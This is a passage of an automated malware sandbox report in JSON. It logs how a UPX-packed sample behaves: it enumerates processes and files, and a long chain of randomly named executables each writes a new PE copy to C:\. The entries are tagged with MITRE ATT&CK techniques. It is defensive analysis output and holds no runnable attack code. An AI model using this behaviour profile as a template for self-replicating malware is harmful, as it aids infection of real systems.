\"jdfnf.exe\" called \"IsWow64Process\" with parameter \"3248\" - (UID: 00000000-00003248)\n \"dtrvhhj.exe\" called \"IsWow64Process\" with parameter \"1876\" - (UID: 00000000-00001876)\n \"xlfdrhv.exe\" called \"IsWow64Process\" with parameter \"4100\" - (UID: 00000000-00004100)\n \"jjjvj.exe\" called \"IsWow64Process\" with parameter \"3712\" - (UID: 00000000-00003712)\n \"vnvdx.exe\" called \"IsWow64Process\" with parameter \"892\" - (UID: 00000000-00000892)\n \"pxxhpb.exe\" called \"IsWow64Process\" with parameter \"864\" - (UID: 00000000-00000864)\n \"4828644.exe\" called \"IsWow64Process\" with parameter \"1436\" - (UID: 00000000-00001436)\n \"6680468.exe\" called \"IsWow64Process\" with parameter \"4004\" - (UID: 00000000-00004004)\n \"80426.exe\" called \"IsWow64Process\" with parameter \"4088\" - (UID: 00000000-00004088)\n \"nhppdj.exe\" called \"IsWow64Process\" with parameter \"3456\" - (UID: 00000000-00003456)\n \"28408.exe\" called \"IsWow64Process\" with parameter \"4604\" - (UID: 00000000-00004604)\n \"40664.exe\" called \"IsWow64Process\" with parameter \"796\" - (UID: 00000000-00000796)\n \"bprdtlh.exe\" called \"IsWow64Process\" with parameter \"3668\" - (UID: 00000000-00003668)\n \"pbpbdlp.exe\" called \"IsWow64Process\" with parameter \"3928\" - (UID: 00000000-00003928)\n \"xbrvntf.exe\" called \"IsWow64Process\" with parameter \"3432\" - (UID: 00000000-00003432)\n \"fvxvdn.exe\" called \"IsWow64Process\" with parameter \"3776\" - (UID: 00000000-00003776)\n \"llxxlrt.exe\" called \"IsWow64Process\" with parameter \"4612\" - (UID: 00000000-00004612)\n \"dfddlr.exe\" called \"IsWow64Process\" with parameter \"4400\" - (UID: 00000000-00004400)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter lpdvdhr.exe (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00004044)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00004044)\n \"lpdvdhr.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00004544)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"lpdvdhr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nrtffvl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"llxjdlf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xhbff.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"brftth.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2644808.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rxbdpdj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jdfnf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dtrvhhj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xlfdrhv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jjjvj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vnvdx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pxxhpb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4828644.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6680468.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"80426.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nhppdj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"28408.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"40664.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bprdtlh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pbpbdlp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xbrvntf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fvxvdn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"llxxlrt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dfddlr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has an entrypoint in section \"UPX1\"\n \"4644224.exe\" has an entrypoint in section \"UPX1\"\n \"62424.exe\" has an entrypoint in section \"UPX1\"\n \"20082.exe\" has an entrypoint in section \"UPX1\"\n \"xxvjvfv.exe\" has an entrypoint in section \"UPX1\"\n \"rpfxpvf.exe\" has an entrypoint in section \"UPX1\"\n \"66262.exe\" has an entrypoint in section \"UPX1\"\n \"6820002.exe\" has an entrypoint in section \"UPX1\"\n \"020066.exe\" has an entrypoint in section \"UPX1\"\n \"fjjxl.exe\" has an entrypoint in section \"UPX1\"\n \"82488.exe\" has an entrypoint in section \"UPX1\"\n \"04226.exe\" has an entrypoint in section \"UPX1\"\n \"240402.exe\" has an entrypoint in section \"UPX1\"\n \"2406002.exe\" has an entrypoint in section \"UPX1\"\n \"drppx.exe\" has an entrypoint in section \"UPX1\"\n \"xtrhlt.exe\" has an entrypoint in section \"UPX1\"\n \"pfrdl.exe\" has an entrypoint in section \"UPX1\"\n \"xfvdbnh.exe\" has an entrypoint in section \"UPX1\"\n \"blvvjn.exe\" has an entrypoint in section \"UPX1\"\n \"fvbpf.exe\" has an entrypoint in section \"UPX1\"\n \"ntpjj.exe\" has an entrypoint in section \"UPX1\"\n \"644880.exe\" has an entrypoint in section \"UPX1\"\n \"824246.exe\" has an entrypoint in section \"UPX1\"\n \"02486.exe\" has an entrypoint in section \"UPX1\"\n \"66842.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" wrote 26418 bytes starting with PE header signature to file \"C:\\lpdvdhr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lpdvdhr.exe\" wrote 26436 bytes starting with PE header signature to file \"C:\\nrtffvl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nrtffvl.exe\" wrote 26456 bytes starting with PE header signature to file \"C:\\npltvpp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"npltvpp.exe\" wrote 26469 bytes starting with PE header signature to file \"C:\\llxjdlf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"llxjdlf.exe\" wrote 26488 bytes starting with PE header signature to file \"C:\\rxrfxtr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rxrfxtr.exe\" wrote 26504 bytes starting with PE header signature to file \"C:\\xhbff.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xhbff.exe\" wrote 26516 bytes starting with PE header signature to file \"C:\\vhppv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vhppv.exe\" wrote 26535 bytes starting with PE header signature to file \"C:\\hfbrlh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hfbrlh.exe\" wrote 26548 bytes starting with PE header signature to file \"C:\\brftth.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"brftth.exe\" wrote 26560 bytes starting with PE header signature to file \"C:\\2644808.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2644808.exe\" wrote 26580 bytes starting with PE header signature to file \"C:\\vjvxf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vjvxf.exe\" wrote 26593 bytes starting with PE header signature to file \"C:\\rxbdpdj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rxbdpdj.exe\" wrote 26612 bytes starting with PE header signature to file \"C:\\jdfnf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jdfnf.exe\" wrote 26632 bytes starting with PE header signature to file \"C:\\llpbnv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"llpbnv.exe\" wrote 26646 bytes starting with PE header signature to file \"C:\\dtrvhhj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dtrvhhj.exe\" wrote 26656 bytes starting with PE header signature to file \"C:\\lxdlb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lxdlb.exe\" wrote 26670 bytes starting with PE header signature to file \"C:\\fplntnd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fplntnd.exe\" wrote 26690 bytes starting with PE header signature to file \"C:\\xlfdrhv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xlfdrhv.exe\" wrote 26705 bytes starting with PE header signature to file \"C:\\nhjtnrr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nhjtnrr.exe\" wrote 26720 bytes starting with PE header signature to file \"C:\\4868486.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4868486.exe\" wrote 26734 bytes starting with PE header signature to file \"C:\\42020.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42020.exe\" wrote 26746 bytes starting with PE header signature to file \"C:\\jjjvj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jjjvj.exe\" wrote 26758 bytes starting with PE header signature to file \"C:\\tljxh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tljxh.exe\" wrote 26768 bytes starting with PE header signature to file \"C:\\vnvdx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vnvdx.exe\" wrote 26782 bytes starting with PE header signature to file \"C:\\pxxhpb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pxxhpb.exe\" wrote 26797 bytes starting with PE header signature to file \"C:\\06204.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06204.exe\" wrote 26811 bytes starting with PE header signature to file \"C:\\4828644.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4828644.exe\" wrote 26829 bytes starting with PE header signature to file \"C:\\4448240.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4448240.exe\" wrote 26847 bytes starting with PE header signature to file \"C:\\6680468.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6680468.exe\" wrote 26866 bytes starting with PE header signature to file \"C:\\80426.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"80426.exe\" wrote 26878 bytes starting with PE header signature to file \"C:\\nhppdj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nhppdj.exe\" wrote 26893 bytes starting with PE header signature to file \"C:\\206666.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"206666.exe\" wrote 26911 bytes starting with PE header signature to file \"C:\\620220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"620220.exe\" wrote 26931 bytes starting with PE header signature to file \"C:\\28408.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"28408.exe\" wrote 26941 bytes starting with PE header signature to file \"C:\\4444446.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4444446.exe\" wrote 26954 bytes starting with PE header signature to file \"C:\\40664.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"40664.exe\" wrote 26967 bytes starting with PE header signature to file \"C:\\bprdtlh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bprdtlh.exe\" wrote 26982 bytes starting with PE header signature to file \"C:\\pbpbdlp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pbpbdlp.exe\" wrote 26997 bytes starting with PE header signature to file \"C:\\jvxvd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jvxvd.exe\" wrote 27016 bytes starting with PE header signature to file \"C:\\jntndr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jntndr.exe\" wrote 27030 bytes starting with PE header signature to file \"C:\\xbrvntf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xbrvntf.exe\" wrote 27046 bytes starting with PE header signature to file \"C:\\thdhnfb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"thdhnfb.exe\" wrote 27059 bytes starting with PE header signature to file \"C:\\fvxvdn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fvxvdn.exe\" wrote 27079 bytes starting with PE header signature to file \"C:\\ltjhnht.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ltjhnht.exe\" wrote 27092 bytes starting with PE header signature to file \"C:\\vpvxpp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vpvxpp.exe\" wrote 27108 bytes starting with PE header signature to file \"C:\\jtpjhr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jtpjhr.exe\" wrote 27128 bytes starting with PE header signature to file \"C:\\llxxlrt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"llxxlrt.exe\" wrote 27148 bytes starting with PE header signature to file \"C:\\dfddlr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dfddlr.exe\" wrote 27167 bytes starting with PE header signature to file \"C:\\84800.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"84800.exe\" wrote 27179 bytes starting with PE header signature to file \"C:\\0806084.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0806084.exe\" wrote 27193 bytes starting with PE header signature to file \"C:\\2484466.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2484466.exe\" wrote 27206 bytes starting with PE header signature to file \"C:\\66842.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66842.exe\" wrote 27226 bytes starting with PE header signature to file \"C:\\02486.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"02486.exe\" wrote 27245 bytes starting with PE header signature to file \"C:\\824246.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"824246.exe\" wrote 27263 bytes starting with PE header signature to file \"C:\\644880.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"644880.exe\" wrote 27282 bytes starting with PE header signature to file \"C:\\ntpjj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ntpjj.exe\" wrote 27302 bytes starting with PE header signature to file \"C:\\fvbpf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fvbpf.exe\" wrote 27321 bytes starting with PE header signature to file \"C:\\blvvjn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n 